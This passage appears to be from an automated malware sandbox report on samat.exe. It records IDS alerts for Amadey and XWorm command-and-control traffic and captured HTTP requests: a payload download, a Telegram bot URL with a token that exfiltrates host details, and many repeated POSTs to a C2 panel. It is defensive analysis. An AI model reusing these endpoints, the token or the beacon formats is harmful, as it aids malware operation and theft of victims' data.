Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 7_2_00007FF7E12E1874
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12C9280 FindFirstFileExW,FindClose, 8_2_00007FF7E12C9280
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12C83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 8_2_00007FF7E12C83C0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12E1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 8_2_00007FF7E12E1874
Source: chrome.exe Memory has grown: Private usage: 11MB later: 27MB

Networking

Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49812 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:49818
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49880 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:50124 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50148 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:50146
Source: Network traffic Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 87.120.112.33:8398 -> 192.168.2.5:50155
Source: Network traffic Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.5:50155 -> 87.120.112.33:8398
Source: Network traffic Suricata IDS: 2858924 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 87.120.112.33:8398 -> 192.168.2.5:50155
Source: Network traffic Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 87.120.112.33:8398 -> 192.168.2.5:50179
Source: Network traffic Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.5:50152 -> 149.154.167.220:443
Source: Malware configuration extractor IPs: 185.215.113.43
Source: unknown DNS query: name: api.telegram.org
Source: global traffic TCP traffic: 192.168.2.5:49822 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.5:50104 -> 1.1.1.1:53
Source: global traffic HTTP traffic detected: GET /samat.exe HTTP/1.1Host: thedotmediagroup.com
Source: global traffic HTTP traffic detected: GET /bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A6513EFE8757A60506E5F%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20EVTO372NG%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 30 32 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008029001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
